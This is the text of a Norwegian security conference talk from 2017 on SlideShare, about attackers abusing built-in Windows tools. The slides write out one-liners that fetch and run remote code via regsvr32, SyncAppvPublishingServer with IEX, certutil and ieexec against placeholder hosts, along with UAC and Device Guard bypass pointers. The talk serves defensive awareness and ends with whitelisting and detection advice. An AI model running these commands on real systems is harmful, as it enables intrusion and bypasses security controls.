Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Hacke windows med windows - avanserte angrep

389 vues

Publié le

Foredrag holdt for Office 365 User Group I Agder 14. september 2017

Publié dans : Technologie
 • Soyez le premier à commenter

 • Soyez le premier à aimer ceci

Hacke windows med windows - avanserte angrep

 1. 1. Hacke Windows med Windows – Avanserte angrep MTUG 10.09.2017
 2. 2. WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Jobbet med IT siden 2000 • Første MCP når jeg var 16 • Work @ Advania – Chief Technical Architect • Gift/barn/hund • Blog: http://oddvar.moe • Twitter: @oddvarmoe
 3. 3. Angrep – Hvordan skaffe seg første tilgang • Tradisjonelt angrep • Sende mail • Link • Vedlegg • Phishing side • Ekstern server • OWA • ADFS • Skype • 3.parts
 4. 4. Trenger du flere eksempler? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C9 6A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EED CE316E4C%21109&o=OneUp
 5. 5. Call to Action!
 6. 6. Call to Action! • Innstilling i Office (2013/2016)
 7. 7. Hva er bak enable content? • Her kommer det interessante • Hva gjør de? • Vi skal se på en del eksempler • Real attacks • «Future attacks»
 8. 8. Hva mener du med «Hacke Windows med Windows» • Angripere har skiftet fokus • Benytter Windows funksjonalitet for å utføre angrep • Misbruker godkjente verktøy • Ikke lengere malware.exe
 9. 9. REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
 10. 10. REGSVR32.exe • Kalkulator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6 b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2 a66/Backdoor-Minimalist.sct scrobj.dll
 11. 11. rundll32.exe • rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Blir nå tatt av Windows Defender) • Detaljert forklaring: https://stackoverflow.com/questions/25131484/rundll32-exe- javascript
 12. 12. Rundll32.exe • Kalkulator: • rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");w indow.close()");
 13. 13. SyncAppvPublishingServer.exe • SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX • Kommando injection feil
 14. 14. SyncAppvPublishingServer.exe • Kalkulator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Bevis på Powershell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
 15. 15. Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
 16. 16. Noen andre uten demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
 17. 17. Min research • BGINFO.exe bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe UAC Bypass og DLL Loading https://msitpros.com/wp- content/uploads/2017/08/WebDavDLLLoadBlog.gif
 18. 18. Min research • CVE-2017-8625 • hh.exe /? (Hva gjør denne tror du?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017- 8625.gif
 19. 19. Kode i kode
 20. 20. EXE filer som kan starte andre EXE filer • Eksempler: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux i Windows)
 21. 21. Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
 22. 22. Hva burde du gjøre? • Application whitelisting • Device Guard • AppLocker • Husk AppLocker bypass listen min: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implementer deteksjon (Splunk / WDATP / ATA)
 23. 23. SELV OM DU KAN RANE EN BANK MED PENN OG PAPIR, BETYR DET IKKE AT DU IKKE SKAL HA ET HVELV!
 24. 24. SHAMELESS PLUG!
 25. 25. Takk for meg!

×